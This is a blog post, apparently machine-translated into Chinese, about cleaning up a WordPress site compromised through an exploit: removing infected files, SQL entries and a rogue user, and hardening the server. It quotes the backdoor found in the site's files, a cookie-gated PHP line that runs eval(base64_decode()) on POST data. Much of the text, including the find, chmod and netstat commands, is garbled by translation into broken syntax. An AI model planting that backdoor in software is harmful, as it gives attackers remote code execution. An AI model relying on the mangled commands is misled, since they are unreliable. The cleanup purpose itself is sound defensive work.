WordPress Exploit - 清理病毒文件、SQL 和服务器安全。

在你读这篇文章之前,你应该看到 张贴在这里,要了解的东西。 :)

我在以下几个博客文件中找到了它 stealthsettings.com,其代码类似于以下代码,该代码是由于 的壮举 WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPC如果上面的有关该文件的 xmlrpc.php 德拉 ,在A grep的 服务器,貌似这种相当多的源代码。

pppffiuuu

清洗受感染的文件:

Ooookkkk ...
1。 最好的解决办法,因为它是做 备份和清理数据库是 消除WordPress (经过仔细检查后,您可以保留与wp平台不严格相关的wp-config.php和文件)并从该版本上载原始文件 2.5.1 (在此之际,进行版本升级WP :)) http://wordpress.org/download/ 。 擦拭包括主题文件,如果你不相信,他们仔细检查。

它似乎已经受到影响,尚未使用之前在博客上,只是改变主题的主题文件,没有解决不了的问题。

./andreea/wp-内容/主题/default/index.php:

2。 搜索并删除所有的文件,其中包含:* _new.php,* _old.php,*。Jpgg,*。吉夫,*。的Pngg和WP-info.txt文件,如果有的话。

找。 -名称“ * _new.php”
找。 -名称“ * _old.php”
找。 名称“ * .jpgg”
找。 -名称“ * _giff”
找。 名称“ * _pngg”
找。 -名称“ wp-info.txt”

3。 在 / tmp目录 ,搜索和删除文件夹,如 tmpYwbzT2

SQL清洗 :

1。 在数据表 为wp_options 检查和删除线: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2.全部在wp_中options, 去 active_plugins 并删除,如果有一个插件,在一个扩展名为* _new.php,* _old.php,*。jpgg,*。吉夫,*。pngg或怀疑另一分机,仔细检查结束。

3。 在表 wp_users,如果有一个用户谁没有写过东西,列在他的右 user_nicename. 删除此用户,但记住 ID 列上的数字。 该用户可能使用“WordPress”钙 用user_login 创建和出现在00:00:00 0000 00 00。

4。 转到表 wp_usermeta 并删除所有线以上属于ID。

完成此sql清理后,禁用然后激活任何插件。 (在博客->仪表板->插件中)

安全服务器:

1。 查看目录和文件“可写“(chmod 第777章 chmod 这将不再允许他们进行任何级别的写作。 (chmod 644,例如)

查找。 彼尔姆2 LS

2。 查看哪些文件有位集 SUIDSGID 。 如果你不使用这些文件对他们提出 chmod 0 或卸载程序包,它包含。 他们是非常危险的,因为他们执行权限““或”“不具有普通用户权限执行该文件。

/型F-烫发04000 LS
/型F-烫发02000 LS

3。 查看哪些端口是开放的,并尝试关闭或担保这些一点用都没有。

NETSTAT-| grep的,我听

这么多。 我看到 有些博客被取缔 de Google Search 和其他人说“他做得很好!!!” . 好吧,我会为他们做的......但是如果谷歌开始禁止你怎么说 所有站点 成型  为垃圾邮件 并把木马(Trojan.Clicker.HTML)放在Cookie中?

作为科技爱好者,我从2006年开始在StealthSettings.com上愉快地撰写文章。我在操作系统方面有丰富的经验,包括macOS、Windows和Linux,还熟悉编程语言和博客平台(WordPress),以及在线商店平台(WooCommerce、Magento、PrestaShop)。

如何以 » 防病毒和安全性 » WordPress Exploit - 清理病毒文件、SQL 和服务器安全。

对“WordPress Exploit - 清理病毒文件、SQL 和服务器安全。”

发表评论